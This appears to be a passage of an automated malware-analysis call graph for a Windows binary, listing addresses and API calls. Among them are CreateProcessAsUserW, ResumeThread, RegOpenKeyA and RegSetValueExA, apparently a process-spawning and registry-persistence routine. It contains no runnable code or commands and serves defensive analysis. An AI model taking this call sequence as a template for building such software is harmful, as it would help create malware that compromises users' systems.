38606->38607 38608 2cf4860 11 API calls 38607->38608 38609 2d17285 38608->38609 38610 2cf47ec 11 API calls 38609->38610 38611 2d172bc 38610->38611 38612 2d089d0 20 API calls 38611->38612 38613 2d172e0 38612->38613 38614 2cf4860 11 API calls 38613->38614 38615 2d1731a 38614->38615 39404 2d0e0f8 38615->39404 38617 2d17349 39414 2d0f214 38617->39414 38620 2cf4860 11 API calls 38621 2d17399 38620->38621 38622 2cf47ec 11 API calls 38621->38622 38623 2d173d0 38622->38623 38624 2d089d0 20 API calls 38623->38624 38625 2d173f4 38624->38625 38626 2cf4860 11 API calls 38625->38626 38627 2d17415 38626->38627 38628 2cf47ec 11 API calls 38627->38628 38629 2d1744c 38628->38629 38630 2d089d0 20 API calls 38629->38630 38631 2d17470 38630->38631 38632 2cf4860 11 API calls 38631->38632 38633 2d17491 38632->38633 38634 2cf47ec 11 API calls 38633->38634 38635 2d174c8 38634->38635 38636 2d089d0 20 API calls 38635->38636 38637 2d174ec 38636->38637 38638 2cf4860 11 API calls 38637->38638 38639 2d1750d 38638->38639 38640 2cf47ec 11 API calls 38639->38640 38641 2d17544 38640->38641 38642 2d089d0 20 API calls 38641->38642 38643 2d17568 38642->38643 38644 2cf4860 11 API calls 38643->38644 38645 2d17589 38644->38645 38646 2cf47ec 11 API calls 38645->38646 38647 2d175c0 38646->38647 38648 2d089d0 20 API calls 38647->38648 38649 2d175e4 38648->38649 38650 2cf4860 11 API calls 38649->38650 38651 2d17605 38650->38651 38652 2cf47ec 11 API calls 38651->38652 38653 2d1763c 38652->38653 38654 2d089d0 20 API calls 38653->38654 38655 2d17660 38654->38655 38656 2cf4860 11 API calls 38655->38656 38657 2d17681 38656->38657 38658 2cf47ec 11 API calls 38657->38658 38659 2d176b8 38658->38659 38660 2d089d0 20 API calls 38659->38660 38661 2d176dc 38660->38661 38662 2cf4860 11 API calls 38661->38662 38663 2d176fd 38662->38663 38664 2cf47ec 11 API calls 38663->38664 38665 2d17734 38664->38665 38666 2d089d0 20 API calls 38665->38666 38667 2d17758 38666->38667 38668 2cf4860 11 API calls 38667->38668 38669 2d17779 38668->38669 38670 2cf47ec 11 API calls 38669->38670 38671 2d177b0 38670->38671 38672 2d089d0 20 API calls 38671->38672 38673 2d177d4 38672->38673 38674 2d177e9 38673->38674 38675 2d18318 38673->38675 38677 2cf4860 11 API calls 38674->38677 38676 2cf4860 11 API calls 38675->38676 38679 2d18339 38676->38679 38678 2d1780a 38677->38678 38681 2cf47ec 11 API calls 38678->38681 38680 2cf47ec 11 API calls 38679->38680 38682 2d18370 38680->38682 38683 2d17841 38681->38683 38684 2d089d0 20 API calls 38682->38684 38685 2d089d0 20 API calls 38683->38685 38686 2d18394 38684->38686 38687 2d17865 38685->38687 38688 2cf4860 11 API calls 38686->38688 38689 2cf4860 11 API calls 38687->38689 38691 2d183b5 38688->38691 38690 2d17886 38689->38690 38692 2cf47ec 11 API calls 38690->38692 38693 2cf47ec 11 API calls 38691->38693 38695 2d178bd 38692->38695 38694 2d183ec 38693->38694 38696 2d089d0 20 API calls 38694->38696 38697 2d089d0 20 API calls 38695->38697 38698 2d18410 38696->38698 38699 2d178e1 38697->38699 38700 2cf4860 11 API calls 38698->38700 38701 2cf4860 11 API calls 38699->38701 38702 2d18431 38700->38702 38703 2d17902 38701->38703 38705 2cf47ec 11 API calls 38702->38705 38704 2cf47ec 11 API calls 38703->38704 38707 2d17939 38704->38707 38706 2d18468 38705->38706 38708 2d089d0 20 API calls 38706->38708 38709 2d089d0 20 API calls 38707->38709 38710 2d1848c 38708->38710 38711 2d1795d 38709->38711 38712 2cf4860 11 API calls 38710->38712 38713 2cf47ec 11 API calls 38711->38713 38715 2d184ad 38712->38715 38714 2d17975 38713->38714 39831 2d085bc 38714->39831 38718 2cf47ec 11 API calls 38715->38718 38721 2d184e4 38718->38721 38719 2cf4860 11 API calls 38720 2d179a7 38719->38720 38723 2cf47ec 11 API calls 38720->38723 38722 2d089d0 20 API calls 38721->38722 38724 2d18508 38722->38724 38727 2d179de 38723->38727 38725 2d193a1 38724->38725 38726 2d1851d 38724->38726 38728 2cf4860 11 API calls 38725->38728 38729 2cf4860 11 API calls 38726->38729 38731 2d089d0 20 API calls 38727->38731 38734 2d193c2 38728->38734 38730 2d1853e 38729->38730 38735 2d18556 38730->38735 38732 2d17a02 38731->38732 38733 2cf4860 11 API calls 38732->38733 38738 2d17a23 38733->38738 38736 2cf47ec 11 API calls 38734->38736 38737 2cf47ec 11 API calls 38735->38737 38741 2d193f9 38736->38741 38739 2d18575 38737->38739 38740 2cf47ec 11 API calls 38738->38740 38742 2d1858d 38739->38742 38746 2d17a5a 38740->38746 38744 2d089d0 20 API calls 38741->38744 38743 2d089d0 20 API calls 38742->38743 38745 2d18599 38743->38745 38747 2d1941d 38744->38747 38748 2cf4860 11 API calls 38745->38748 38751 2d089d0 20 API calls 38746->38751 38749 2cf4860 11 API calls 38747->38749 38750 2d185ba 38748->38750 38754 2d1943e 38749->38754 38755 2d185c5 38750->38755 38752 2d17a7e 38751->38752 38753 2cf4860 11 API calls 38752->38753 38759 2d17a9f 38753->38759 38756 2cf47ec 11 API calls 38754->38756 38757 2cf47ec 11 API calls 38755->38757 38761 2d19475 38756->38761 38758 2d185f1 38757->38758 38762 2d185fc 38758->38762 38760 2cf47ec 11 API calls 38759->38760 38766 2d17ad6 38760->38766 38763 2d089d0 20 API calls 38761->38763 38764 2d089d0 20 API calls 38762->38764 38767 2d19499 38763->38767 38765 2d18615 38764->38765 38768 2cf4860 11 API calls 38765->38768 38770 2d089d0 20 API calls 38766->38770 38769 2cf4860 11 API calls 38767->38769 38772 2d18636 38768->38772 38771 2d194ba 38769->38771 38773 2d17afa 38770->38773 38774 2cf47ec 11 API calls 38771->38774 38775 2cf47ec 11 API calls 38772->38775 39843 2d0adf8 29 API calls 38773->39843 38779 2d194f1 38774->38779 38780 2d1866d 38775->38780 38777 2d17b21 38778 2cf4860 11 API calls 38777->38778 38783 2d17b42 38778->38783 38781 2d089d0 20 API calls 38779->38781 38782 2d089d0 20 API calls 38780->38782 38791 2d19515 38781->38791 38784 2d18691 38782->38784 38787 2cf47ec 11 API calls 38783->38787 38785 2cf47ec 11 API calls 38784->38785 38786 2d186bd 38785->38786 38790 2d186d5 38786->38790 38792 2d17b79 38787->38792 38788 2d19cf5 38789 2cf4860 11 API calls 38788->38789 38794 2d19d16 38789->38794 38795 2d186e0 CreateProcessAsUserW 38790->38795 38791->38788 38793 2cf4860 11 API calls 38791->38793 38796 2d089d0 20 API calls 38792->38796 38804 2d19560 38793->38804 38800 2cf47ec 11 API calls 38794->38800 38797 2d186f2 38795->38797 38798 2d1876e 38795->38798 38799 2d17b9d 38796->38799 38802 2cf4860 11 API calls 38797->38802 38801 2cf4860 11 API calls 38798->38801 38803 2cf4860 11 API calls 38799->38803 38810 2d19d4d 38800->38810 38811 2d1878f 38801->38811 38805 2d18713 38802->38805 38808 2d17bbe 38803->38808 38806 2cf47ec 11 API calls 38804->38806 38807 2d1871e 38805->38807 38809 2d19597 38806->38809 38815 2cf47ec 11 API calls 38807->38815 38812 2cf47ec 11 API calls 38808->38812 38821 2d089d0 20 API calls 38809->38821 38813 2d089d0 20 API calls 38810->38813 38814 2cf47ec 11 API calls 38811->38814 38820 2d17bf5 38812->38820 38816 2d19d71 38813->38816 38823 2d187c6 38814->38823 38817 2d1874a 38815->38817 38818 2cf4860 11 API calls 38816->38818 38819 2d18755 38817->38819 38825 2d19d92 38818->38825 38827 2d089d0 20 API calls 38819->38827 38828 2d089d0 20 API calls 38820->38828 38822 2d195bb 38821->38822 38824 2cf4860 11 API calls 38822->38824 38826 2d089d0 20 API calls 38823->38826 38834 2d195dc 38824->38834 38831 2cf47ec 11 API calls 38825->38831 38829 2d187ea 38826->38829 38827->38798 38830 2d17c19 38828->38830 38832 2cf4860 11 API calls 38829->38832 38833 2cf4860 11 API calls 38830->38833 38836 2d19dc9 38831->38836 38837 2d1880b 38832->38837 38838 2d17c3a 38833->38838 38835 2cf47ec 11 API calls 38834->38835 38842 2d19613 38835->38842 38840 2d089d0 20 API calls 38836->38840 38841 2cf47ec 11 API calls 38837->38841 38839 2cf47ec 11 API calls 38838->38839 38846 2d17c71 38839->38846 38843 2d19ded 38840->38843 38848 2d18842 38841->38848 38845 2d089d0 20 API calls 38842->38845 38844 2cf4860 11 API calls 38843->38844 38850 2d19e0e 38844->38850 38847 2d19637 38845->38847 38852 2d089d0 20 API calls 38846->38852 38849 2cf4860 11 API calls 38847->38849 38851 2d089d0 20 API calls 38848->38851 38856 2d19658 38849->38856 38855 2cf47ec 11 API calls 38850->38855 38853 2d18866 38851->38853 38854 2d17c95 38852->38854 38857 2cf49f8 11 API calls 38853->38857 38859 2cf4860 11 API calls 38854->38859 38861 2d19e45 38855->38861 38860 2cf47ec 11 API calls 38856->38860 38858 2d1888a 38857->38858 38862 2cf4860 11 API calls 38858->38862 38865 2d17cd5 38859->38865 38866 2d1968f 38860->38866 38863 2d089d0 20 API calls 38861->38863 38864 2d188b9 38862->38864 38870 2d19e69 38863->38870 38871 2d188c4 38864->38871 38867 2cf47ec 11 API calls 38865->38867 38868 2d089d0 20 API calls 38866->38868 38874 2d17d0c 38867->38874 38869 2d196b3 38868->38869 38872 2d0f094 11 API calls 38869->38872 38876 2d089d0 20 API calls 38870->38876 38873 2cf47ec 11 API calls 38871->38873 38875 2d196ce 38872->38875 38877 2d188f0 38873->38877 38879 2d089d0 20 API calls 38874->38879 38878 2cf4860 11 API calls 38875->38878 38881 2d19e9c 38876->38881 38882 2d188fb 38877->38882 38884 2d196f7 38878->38884 38880 2d17d30 38879->38880 38883 2cf4860 11 API calls 38880->38883 38886 2d089d0 20 API calls 38881->38886 38885 2d089d0 20 API calls 38882->38885 38890 2d17d51 38883->38890 38888 2cf4860 11 API calls 38884->38888 38887 2d18914 38885->38887 38891 2d19ecf 38886->38891 38889 2cf4860 11 API calls 38887->38889 38893 2d1972f 38888->38893 38894 2d18935 38889->38894 38892 2cf47ec 11 API calls 38890->38892 38895 2d089d0 20 API calls 38891->38895 38898 2d17d88 38892->38898 38896 2cf47ec 11 API calls 38893->38896 38897 2cf47ec 11 API calls 38894->38897 38900 2d19f02 38895->38900 38903 2d19766 38896->38903 38901 2d1896c 38897->38901 38899 2d089d0 20 API calls 38898->38899 38902 2d17dac 38899->38902 38904 2d089d0 20 API calls 38900->38904 38907 2d089d0 20 API calls 38901->38907 38905 2cf4860 11 API calls 38902->38905 38908 2d089d0 20 API calls 38903->38908 38906 2d19f35 38904->38906 38914 2d17dcd 38905->38914 38910 2cf4860 11 API calls 38906->38910 38911 2d18990 38907->38911 38909 2d1978a 38908->38909 38912 2cf4860 11 API calls 38909->38912 38915 2d19f56 38910->38915 38913 2cf4860 11 API calls 38911->38913 38917 2d197ab 38912->38917 38918 2d189b1 38913->38918 38916 2cf47ec 11 API calls 38914->38916 38919 2cf47ec 11 API calls 38915->38919 38922 2d17e04 38916->38922 38920 2cf47ec 11 API calls 38917->38920 38921 2cf47ec 11 API calls 38918->38921 38924 2d19f8d 38919->38924 38926 2d197e2 38920->38926 38927 2d189e8 38921->38927 38923 2d089d0 20 API calls 38922->38923 38925 2d17e28 38923->38925 38929 2d089d0 20 API calls 38924->38929 39844 2d05aec 42 API calls 38925->39844 38932 2d089d0 20 API calls 38926->38932 38930 2d089d0 20 API calls 38927->38930 38933 2d19fb1 38929->38933 38935 2d18a0c 38930->38935 38937 2d19806 38932->38937 38934 2cf4860 11 API calls 38933->38934 38947 2d19fd2 38934->38947 39847 2d0d164 23 API calls 38935->39847 38936 2d17e54 38944 2cf4bcc 11 API calls 38936->38944 39426 2cf7e5c 38937->39426 38941 2d18a20 38943 2cf4860 11 API calls 38941->38943 38942 2d19aef 38946 2cf4860 11 API calls 38942->38946 38951 2d18a46 38943->38951 38948 2d17e69 38944->38948 38945 2cf4860 11 API calls 38952 2d19839 38945->38952 38953 2d19b10 38946->38953 38950 2cf47ec 11 API calls 38947->38950 38949 2cf4860 11 API calls 38948->38949 38954 2d17e8a 38949->38954 38958 2d1a009 38950->38958 38955 2cf47ec 11 API calls 38951->38955 38956 2cf47ec 11 API calls 38952->38956 38957 2cf47ec 11 API calls 38953->38957 38959 2cf47ec 11 API calls 38954->38959 38962 2d18a7d 38955->38962 38963 2d19870 38956->38963 38964 2d19b47 38957->38964 38960 2d089d0 20 API calls 38958->38960 38967 2d17ec1 38959->38967 38961 2d1a02d 38960->38961 38965 2cf4860 11 API calls 38961->38965 38966 2d089d0 20 API calls 38962->38966 38970 2d089d0 20 API calls 38963->38970 38968 2d089d0 20 API calls 38964->38968 38977 2d1a04e 38965->38977 38969 2d18aa1 38966->38969 38973 2d089d0 20 API calls 38967->38973 38971 2d19b6b 38968->38971 38972 2cf4860 11 API calls 38969->38972 38974 2d19894 38970->38974 38976 2cf4860 11 API calls 38971->38976 38980 2d18ac2 38972->38980 38978 2d17ee5 38973->38978 38975 2cf4860 11 API calls 38974->38975 38982 2d198b5 38975->38982 38983 2d19b8c 38976->38983 38979 2cf47ec 11 API calls 38977->38979 38981 2cf49f8 11 API calls 38978->38981 38990 2d1a085 38979->38990 38985 2cf47ec 11 API calls 38980->38985 38984 2d17f02 38981->38984 38988 2cf47ec 11 API calls 38982->38988 38989 2cf47ec 11 API calls 38983->38989 39845 2d07e50 17 API calls 38984->39845 38993 2d18af9 38985->38993 38987 2d17f08 38991 2cf4860 11 API calls 38987->38991 38994 2d198ec 38988->38994 38995 2d19bc3 38989->38995 38992 2d089d0 20 API calls 38990->38992 38996 2d17f29 38991->38996 39000 2d1a0a9 38992->39000 38997 2d089d0 20 API calls 38993->38997 38998 2d089d0 20 API calls 38994->38998 38999 2d089d0 20 API calls 38995->38999 39003 2cf47ec 11 API calls 38996->39003 39001 2d18b1d 38997->39001 39004 2d19910 38998->39004 39005 2d19be7 38999->39005 39007 2d089d0 20 API calls 39000->39007 39002 2cf4860 11 API calls 39001->39002 39009 2d18b3e 39002->39009 39010 2d17f60 39003->39010 39008 2cf4860 11 API calls 39004->39008 39006 2cf4860 11 API calls 39005->39006 39012 2d19c08 39006->39012 39013 2d1a0dc 39007->39013 39011 2d19931 39008->39011 39014 2cf47ec 11 API calls 39009->39014 39015 2d089d0 20 API calls 39010->39015 39016 2cf47ec 11 API calls 39011->39016 39017 2cf47ec 11 API calls 39012->39017 39018 2d089d0 20 API calls 39013->39018 39021 2d18b75 39014->39021 39019 2d17f84 39015->39019 39022 2d19968 39016->39022 39023 2d19c3f 39017->39023 39024 2d1a10f 39018->39024 39020 2cf4860 11 API calls 39019->39020 39025 2d17fa5 39020->39025 39026 2d089d0 20 API calls 39021->39026 39027 2d089d0 20 API calls 39022->39027 39028 2d089d0 20 API calls 39023->39028 39029 2d089d0 20 API calls 39024->39029 39031 2cf47ec 11 API calls 39025->39031 39030 2d18b99 39026->39030 39032 2d1998c 39027->39032 39033 2d19c63 39028->39033 39041 2d1a142 39029->39041 39034 2d18ba2 39030->39034 39035 2d18bb9 39030->39035 39043 2d17fdc 39031->39043 39037 2d0e358 11 API calls 39032->39037 39038 2cf4860 11 API calls 39033->39038 39848 2d08730 17 API calls 39034->39848 39036 2cf4860 11 API calls 39035->39036 39048 2d18bda 39036->39048 39040 2d199a1 39037->39040 39046 2d19c84 39038->39046 39042 2cf4530 11 API calls 39040->39042 39047 2d089d0 20 API calls 39041->39047 39044 2d199b1 39042->39044 39049 2d089d0 20 API calls 39043->39049 39045 2cf4860 11 API calls 39044->39045 39054 2d199d2 39045->39054 39050 2cf47ec 11 API calls 39046->39050 39055 2d1a175 39047->39055 39051 2cf47ec 11 API calls 39048->39051 39052 2d18000 39049->39052 39057 2d19cbb 39050->39057 39059 2d18c11 39051->39059 39053 2cf4860 11 API calls 39052->39053 39060 2d18021 39053->39060 39056 2cf47ec 11 API calls 39054->39056 39058 2d089d0 20 API calls 39055->39058 39068 2d19a09 39056->39068 39062 2d089d0 20 API calls 39057->39062 39061 2d1a1a8 39058->39061 39064 2d089d0 20 API calls 39059->39064 39065 2cf47ec 11 API calls 39060->39065 39063 2cf4860 11 API calls 39061->39063 39066 2d19cdf 39062->39066 39074 2d1a1c9 39063->39074 39067 2d18c35 39064->39067 39075 2d18058 39065->39075 39069 2cf49f8 11 API calls 39066->39069 39070 2cf4860 11 API calls 39067->39070 39072 2d089d0 20 API calls 39068->39072 39071 2d19ce9 39069->39071 39078 2d18c56 39070->39078 39430 2d08d70 39071->39430 39076 2d19a2d 39072->39076 39077 2cf47ec 11 API calls 39074->39077 39080 2d089d0 20 API calls 39075->39080 39079 2cf4860 11 API calls 39076->39079 39085 2d1a200 39077->39085 39081 2cf47ec 11 API calls 39078->39081 39084 2d19a4e 39079->39084 39082 2d1807c 39080->39082 39088 2d18c8d 39081->39088 39083 2cf4860 11 API calls 39082->39083 39090 2d1809d 39083->39090 39086 2cf47ec 11 API calls 39084->39086 39087 2d089d0 20 API calls 39085->39087 39095 2d19a85 39086->39095 39089 2d1a224 39087->39089 39092 2d089d0 20 API calls 39088->39092 39091 2cf4860 11 API calls 39089->39091 39093 2cf47ec 11 API calls 39090->39093 39098 2d1a245 39091->39098 39094 2d18cb1 39092->39094 39099 2d180d4 39093->39099 39096 2cf4860 11 API calls 39094->39096 39097 2d089d0 20 API calls 39095->39097 39100 2d18cd2 39096->39100 39107 2d19aa9 39097->39107 39101 2cf47ec 11 API calls 39098->39101 39102 2d089d0 20 API calls 39099->39102 39103 2cf47ec 11 API calls 39100->39103 39106 2d1a27c 39101->39106 39104 2d180f8 39102->39104 39110 2d18d09 39103->39110 39846 2d0b118 39 API calls 39104->39846 39109 2d089d0 20 API calls 39106->39109 39108 2d0dc8c 17 API calls 39107->39108 39108->38942 39114 2d1a2a0 39109->39114 39112 2d089d0 20 API calls 39110->39112 39111 2d18109 39113 2d18d2d ResumeThread 39112->39113 39115 2cf4860 11 API calls 39113->39115 39116 2d089d0 20 API calls 39114->39116 39119 2d18d59 39115->39119 39117 2d1a2d3 39116->39117 39118 2cf4860 11 API calls 39117->39118 39121 2d1a2f4 39118->39121 39120 2cf47ec 11 API calls 39119->39120 39123 2d18d90 39120->39123 39122 2cf47ec 11 API calls 39121->39122 39126 2d1a32b 39122->39126 39124 2d089d0 20 API calls 39123->39124 39125 2d18db4 39124->39125 39127 2cf4860 11 API calls 39125->39127 39128 2d089d0 20 API calls 39126->39128 39131 2d18dd5 39127->39131 39129 2d1a34f 39128->39129 39130 2cf4860 11 API calls 39129->39130 39133 2d1a370 39130->39133 39132 2cf47ec 11 API calls 39131->39132 39135 2d18e0c 39132->39135 39134 2cf47ec 11 API calls 39133->39134 39138 2d1a3a7 39134->39138 39136 2d089d0 20 API calls 39135->39136 39137 2d18e30 39136->39137 39139 2cf4860 11 API calls 39137->39139 39140 2d089d0 20 API calls 39138->39140 39143 2d18e51 39139->39143 39141 2d1a3cb 39140->39141 39142 2cf4860 11 API calls 39141->39142 39145 2d1a3ec 39142->39145 39144 2cf47ec 11 API calls 39143->39144 39146 2d18e88 39144->39146 39147 2cf47ec 11 API calls 39145->39147 39148 2d089d0 20 API calls 39146->39148 39150 2d1a423 39147->39150 39149 2d18eac CloseHandle 39148->39149 39151 2cf4860 11 API calls 39149->39151 39152 2d089d0 20 API calls 39150->39152 39153 2d18ed8 39151->39153 39154 2d1a447 39152->39154 39155 2cf47ec 11 API calls 39153->39155 39156 2d089d0 20 API calls 39154->39156 39157 2d18f0f 39155->39157 39159 2d1a47a 39156->39159 39158 2d089d0 20 API calls 39157->39158 39160 2d18f33 39158->39160 39161 2d089d0 20 API calls 39159->39161 39162 2cf4860 11 API calls 39160->39162 39163 2d1a4ad 39161->39163 39164 2d18f54 39162->39164 39165 2d089d0 20 API calls 39163->39165 39166 2cf47ec 11 API calls 39164->39166 39167 2d1a4e0 39165->39167 39168 2d18f8b 39166->39168 39169 2d089d0 20 API calls 39167->39169 39170 2d089d0 20 API calls 39168->39170 39172 2d1a513 39169->39172 39171 2d18faf 39170->39171 39173 2cf4860 11 API calls 39171->39173 39174 2cf4860 11 API calls 39172->39174 39176 2d18fd0 39173->39176 39175 2d1a534 39174->39175 39177 2cf47ec 11 API calls 39175->39177 39178 2cf47ec 11 API calls 39176->39178 39179 2d1a56b 39177->39179 39180 2d19007 39178->39180 39181 2d089d0 20 API calls 39179->39181 39182 2d089d0 20 API calls 39180->39182 39183 2d1a58f 39181->39183 39184 2d1902b 39182->39184 39185 2cf4860 11 API calls 39183->39185 39186 2cf4860 11 API calls 39184->39186 39187 2d1a5b0 39185->39187 39188 2d1904c 39186->39188 39189 2cf47ec 11 API calls 39187->39189 39190 2cf47ec 11 API calls 39188->39190 39191 2d1a5e7 39189->39191 39192 2d19083 39190->39192 39193 2d089d0 20 API calls 39191->39193 39194 2d089d0 20 API calls 39192->39194 39197 2d1a60b 39193->39197 39195 2d190a7 39194->39195 39196 2cf4860 11 API calls 39195->39196 39198 2d190c8 39196->39198 39199 2d089d0 20 API calls 39197->39199 39200 2cf47ec 11 API calls 39198->39200 39201 2d1a63e 39199->39201 39203 2d190ff 39200->39203 39202 2d089d0 20 API calls 39201->39202 39206 2d1a671 39202->39206 39204 2d089d0 20 API calls 39203->39204 39205 2d19123 39204->39205 39207 2cf4860 11 API calls 39205->39207 39208 2d089d0 20 API calls 39206->39208 39209 2d19144 39207->39209 39211 2d1a6a4 39208->39211 39210 2cf47ec 11 API calls 39209->39210 39213 2d1917b 39210->39213 39212 2d089d0 20 API calls 39211->39212 39214 2d1a6d7 39212->39214 39215 2d089d0 20 API calls 39213->39215 39217 2d089d0 20 API calls 39214->39217 39216 2d1919f 39215->39216 39218 2cf4860 11 API calls 39216->39218 39219 2d1a70a 39217->39219 39221 2d191c0 39218->39221 39220 2cf4860 11 API calls 39219->39220 39222 2d1a72b 39220->39222 39223 2cf47ec 11 API calls 39221->39223 39224 2cf47ec 11 API calls 39222->39224 39225 2d191f7 39223->39225 39226 2d1a762 39224->39226 39227 2d089d0 20 API calls 39225->39227 39229 2d089d0 20 API calls 39226->39229 39228 2d1921b 39227->39228 39232 2d0894c 21 API calls 39228->39232 39230 2d1a786 39229->39230 39231 2cf4860 11 API calls 39230->39231 39236 2d1a7a7 39231->39236 39233 2d1923a 39232->39233 39234 2d0894c 21 API calls 39233->39234 39235 2d1924e 39234->39235 39237 2d0894c 21 API calls 39235->39237 39239 2cf47ec 11 API calls 39236->39239 39238 2d19262 39237->39238 39240 2d0894c 21 API calls 39238->39240 39244 2d1a7de 39239->39244 39241 2d19276 39240->39241 39242 2d0894c 21 API calls 39241->39242 39243 2d1928a 39242->39243 39245 2d0894c 21 API calls 39243->39245 39247 2d089d0 20 API calls 39244->39247 39246 2d1929e CloseHandle 39245->39246 39248 2cf4860 11 API calls 39246->39248 39249 2d1a802 39247->39249 39251 2d192ca 39248->39251 39250 2cf4860 11 API calls 39249->39250 39252 2d1a823 39250->39252 39253 2cf47ec 11 API calls 39251->39253 39254 2cf47ec 11 API calls 39252->39254 39255 2d19301 39253->39255 39257 2d1a85a 39254->39257 39256 2d089d0 20 API calls 39255->39256 39258 2d19325 39256->39258 39259 2d089d0 20 API calls 39257->39259 39260 2cf4860 11 API calls 39258->39260 39261 2d1a87e 39259->39261 39263 2d19346 39260->39263 39262 2cf4860 11 API calls 39261->39262 39264 2d1a89f 39262->39264 39265 2cf47ec 11 API calls 39263->39265 39266 2cf47ec 11 API calls 39264->39266 39267 2d1937d 39265->39267 39268 2d1a8d6 39266->39268 39269 2d089d0 20 API calls 39267->39269 39270 2d089d0 20 API calls 39268->39270 39269->38725 39271 2d1a8fa 39270->39271 39272 2cf4860 11 API calls 39271->39272 39273 2d1a91b 39272->39273 39274 2cf47ec 11 API calls 39273->39274 39275 2d1a952 39274->39275 39276 2d089d0 20 API calls 39275->39276 39277 2d1a976 39276->39277 39278 2d089d0 20 API calls 39277->39278 39279 2d1a985 39278->39279 39280 2d089d0 20 API calls 39279->39280 39281 2d1a994 39280->39281 39282 2d089d0 20 API calls 39281->39282 39283 2d1a9a3 39282->39283 39284 2d089d0 20 API calls 39283->39284 39285 2d1a9b2 39284->39285 39286 2d089d0 20 API calls 39285->39286 39287 2d1a9c1 39286->39287 39288 2d089d0 20 API calls 39287->39288 39289 2d1a9d0 39288->39289 39290 2d089d0 20 API calls 39289->39290 39291 2d1a9df 39290->39291 39292 2d089d0 20 API calls 39291->39292 39293 2d1a9ee 39292->39293 39294 2d089d0 20 API calls 39293->39294 39295 2d1a9fd 39294->39295 39296 2d089d0 20 API calls 39295->39296 39297 2d1aa0c 39296->39297 39298 2d089d0 20 API calls 39297->39298 39299 2d1aa1b 39298->39299 39300 2d089d0 20 API calls 39299->39300 39301 2d1aa2a 39300->39301 39302 2d089d0 20 API calls 39301->39302 39303 2d1aa39 39302->39303 39304 2d089d0 20 API calls 39303->39304 39305 2d1aa48 39304->39305 39306 2d089d0 20 API calls 39305->39306 39307 2d1aa57 39306->39307 39308 2cf4860 11 API calls 39307->39308 39309 2d1aa78 39308->39309 39310 2cf47ec 11 API calls 39309->39310 39311 2d1aaaf 39310->39311 39312 2d089d0 20 API calls 39311->39312 39313 2d1aad3 39312->39313 39314 2d089d0 20 API calls 39313->39314 39315 2d1ab06 39314->39315 39316 2d089d0 20 API calls 39315->39316 39317 2d1ab39 39316->39317 39318 2d089d0 20 API calls 39317->39318 39319 2d1ab6c 39318->39319 39320 2d089d0 20 API calls 39319->39320 39321 2d1ab9f 39320->39321 39322 2d089d0 20 API calls 39321->39322 39323 2d1abd2 39322->39323 39324 2d089d0 20 API calls 39323->39324 39325 2d1ac05 39324->39325 39326 2d089d0 20 API calls 39325->39326 39327 2d1ac38 39326->39327 39328 2cf4860 11 API calls 39327->39328 39329 2d1ac59 39328->39329 39330 2cf47ec 11 API calls 39329->39330 39331 2d1ac90 39330->39331 39332 2d089d0 20 API calls 39331->39332 39333 2d1acb4 39332->39333 39334 2cf4860 11 API calls 39333->39334 39335 2d1acd5 39334->39335 39336 2cf47ec 11 API calls 39335->39336 39337 2d1ad0c 39336->39337 39338 2d089d0 20 API calls 39337->39338 39339 2d1ad30 39338->39339 39340 2cf4860 11 API calls 39339->39340 39341 2d1ad51 39340->39341 39342 2cf47ec 11 API calls 39341->39342 39343 2d1ad88 39342->39343 39344 2d089d0 20 API calls 39343->39344 39345 2d1adac 39344->39345 39346 2d089d0 20 API calls 39345->39346 39347 2d1addf 39346->39347 39348 2d089d0 20 API calls 39347->39348 39349 2d1ae12 39348->39349 39350 2d089d0 20 API calls 39349->39350 39351 2d1ae45 39350->39351 39352 2d089d0 20 API calls 39351->39352 39353 2d1ae78 39352->39353 39354 2d089d0 20 API calls 39353->39354 39355 2d1aeab 39354->39355 39356 2d089d0 20 API calls 39355->39356 39357 2d1aede 39356->39357 39358 2d089d0 20 API calls 39357->39358 39359 2d1af11 39358->39359 39360 2d089d0 20 API calls 39359->39360 39361 2d1af44 39360->39361 39362 2d089d0 20 API calls 39361->39362 39363 2d1af77 39362->39363 39364 2d089d0 20 API calls 39363->39364 39365 2d1afaa 39364->39365 39366 2d089d0 20 API calls 39365->39366 39367 2d1afdd 39366->39367 39368 2d089d0 20 API calls 39367->39368 39369 2d1b010 39368->39369 39370 2d089d0 20 API calls 39369->39370 39371 2d1b043 39370->39371 39372 2d089d0 20 API calls 39371->39372 39373 2d1b076 39372->39373 39374 2d089d0 20 API calls 39373->39374 39375 2d1b0a9 39374->39375 39376 2d089d0 20 API calls 39375->39376 39377 2d1b0dc 39376->39377 39378 2d089d0 20 API calls 39377->39378 39379 2d1b10f 39378->39379 39380 2d089d0 20 API calls 39379->39380 39381 2d1b142 39380->39381 39382 2d089d0 20 API calls 39381->39382 39383 2d1b175 39382->39383 39384 2d08338 18 API calls 39383->39384 39385 2d1b184 39384->39385 39386 2cf4860 11 API calls 39385->39386 39387 2d1b1a5 39386->39387 39388 2cf47ec 11 API calls 39387->39388 39389 2d1b1dc 39388->39389 39390 2d089d0 20 API calls 39389->39390 39391 2d1b200 39390->39391 39392 2cf4860 11 API calls 39391->39392 39393 2d1b221 39392->39393 39394 2cf47ec 11 API calls 39393->39394 39395 2d1b258 39394->39395 39396 2d089d0 20 API calls 39395->39396 39397 2d1b27c 39396->39397 39398 2cf4860 11 API calls 39397->39398 39399 2d1b29d 39398->39399 39400 2cf47ec 11 API calls 39399->39400 39401 2d1b2d4 39400->39401 39402 2d089d0 20 API calls 39401->39402 39403 2d1b2f8 ExitProcess 39402->39403 39410 2d0e114 39404->39410 39405 2d0e197 39406 2cf44dc 11 API calls 39405->39406 39408 2d0e19f 39406->39408 39407 2cf49f8 11 API calls 39407->39410 39409 2cf4530 11 API calls 39408->39409 39411 2d0e1aa 39409->39411 39410->39405 39410->39407 39412 2cf4500 11 API calls 39411->39412 39413 2d0e1c4 39412->39413 39413->38617 39415 2d0f22b 39414->39415 39416 2d0f256 RegOpenKeyA 39415->39416 39417 2d0f264 39416->39417 39418 2cf49f8 11 API calls 39417->39418 39419 2d0f27c 39418->39419 39420 2d0f289 RegSetValueExA RegCloseKey 39419->39420 39421 2d0f2ad 39420->39421 39422 2cf4500 11 API calls 39421->39422 39423 2d0f2ba 39422->39423 39424 2cf44dc 11 API calls 39423->39424 39425 2d0f2c2 39424->39425 39425->38620 39849 2cf49a0 39426->39849 39429 2cf7e71 39429->38942 39429->38945 39431 2d08d78 39430->39431 39432 2cf4860 11 API calls 39431->39432 39433 2d08dbb 39432->39433 39434 2cf47ec 11 API calls 39433->39434 39435 2d08de0 39434->39435 39436 2d089d0 20 API calls 39435->39436 39437 2d08dfb 39436->39437 39438 2cf4860 11 API calls 39437->39438 39439 